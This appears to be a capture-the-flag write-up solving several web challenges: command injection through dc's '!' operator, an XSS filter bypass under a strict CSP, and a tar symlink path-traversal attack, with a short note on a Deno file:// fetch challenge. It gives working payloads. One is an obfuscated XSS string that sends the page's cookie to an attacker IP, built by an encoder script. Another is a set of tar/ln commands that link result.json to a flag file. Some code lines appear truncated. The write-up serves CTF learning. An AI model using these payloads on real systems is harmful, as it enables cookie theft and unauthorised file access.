
This challenge is relatively straightforward, as there is parameter injection present in the code below.

proc =['dc', script_file],capture_output=True,text=True,timeout=1)

According to the manual.

-e expr


Evaluate expr as DC commands.


Will run the rest of the line as a system command.

Execute arbitrary expressions using expression, and perform command injection using !.*%0a



<meta http-equiv="content-security-policy" content="default-src 'none'; script-src 'unsafe-inline';">
const params = new URLSearchParams(;
const v = params.get("v");
if (/^[0-f +-]+$/g.test(v)) {
result.innerHTML = `${v} = ${parseInt(v, 16)}`;

Although 0-f seems fine, it actually refers to the index from 48 to 102 in ASCII, including uppercase letters and some symbols. With this discovery, I quickly came up with the outline of a payload.

<SVG ONLOAD=I=toString;S=``[constructor][fromCharCode];a['parent']['location']['href']=`HTTP`+`://`+IP+`?`+a['parent']['document']['cookie']><IMG><IFRAME NAME=a SRCDOC=1>

Considering CSP, in order to bring out the flag, a top-level jump such as location needs to be used. To obtain the document object, I injected an <iframe srcdoc=1 id=xx>, and then used xx[parent][document] to retrieve the document. Next, I referenced jsfuck and wrote a simplified version tailored to this problem.


const MAPPING = {

// 'S':"`S`",
// 'C':"`C`",
// console.log(Object.keys(MAPPING).length)
// console.log(MAPPING)

const EXP={
let exp="<SVG ONLOAD=I=toString;S=``[constructor][fromCharCode];a['parent']['location']['href']=`HTTP`+'://'+`x`+'.'+`x`+'.'+`x`+'.'+`x?`+a['parent']['document']['cookie']><IMG><IFRAME NAME=a SRCDOC=1>".replace("constructor",CONSTRUCTORS["constructor"]).replace("fromCharCode",CONSTRUCTORS["fromCharCode"]).replace("toString",CONSTRUCTORS["toString"])
function isUpperCase(str) {
return str === str.toUpperCase() && str!=':' && str!='/' && str!='.';

for (key in EXP){
// console.log(key)

for(i in key){

s = s + '`'+key.charAt(i)+'`+'
s = s+MAPPING[key.charAt(i)]+"+"
EXP[key]=s.slice(0, -1)
console.log(key+" is: "+s.slice(0, -1)+"\n")

const pattern = /'([^']*)'/g;
let match;
while ((match = pattern.exec(exp))) {
exp = exp.replace("'"+match[1]+"'",EXP[match[1]])

However, this is unintended. The author actually intended to use HTMLAnchorElement.toString to obtain lowercase letters, as can be seen in the following example.

console.log(A+"") //abcdefghijklmnopqrstuvwxyz:


  • Users can upload tar files, and /web-apps/src/archives will create a directory with a UUID and save the tar file in that directory.
  • The saved tar file will be located at ${UUID}/archive.tar.
  • The contents of the tar file will be extracted and saved in the ${UUID}/files/ directory.
  • Information about the files in the files directory will be recorded in the ${UUID}/result.json file.
def extract_archive(archive_path, extract_folder):
with as archive:
for member in archive.getmembers():
if[0] == '/' or '..' in # 防止绝对路径,目录穿越
raise HackingException('Malicious archive')

Python’s tar module can include symbolic links.

This challenge is similar to a challenge I encountered when I first started learning CTF. I remember that the steps for that challenge involved uploading a symbolic link xxx that points to the www directory, followed by uploading xxx/shell, which would extract the shell file to the www directory.

This challenge is similar in that all that is needed is to replace ${UUID}/result.json with a symbolic link that points to the flag. First, upload any tar file and record its uuid.

ln -s /web-apps/src/archives/uuid xxx
tar -cvf exp.tar xxx
rm xxx

mkdir xxx
ln -s /web-apps/src/flag.txt result.json
cp result.json xxx/result.json

tar -rf exp.tar xxx/result.json
rm -rf xxx
# tar -tvf exp.tar
lrwxrwxrwx root/root 0 2023-07-9 14:03 xxx -> /web-apps/src/archives/uuid
lrwxrwxrwx root/root 0 2023-07-9 14:04 xxx/result.json -> /web-apps/src/flag.txt


I was unable to solve this challenge because I first consulted the Deno official manual and did not see that fetch supports the file:// protocol, so I did not consider the file:// protocol.

You can refer to the official writeup or this link ↗ for more information.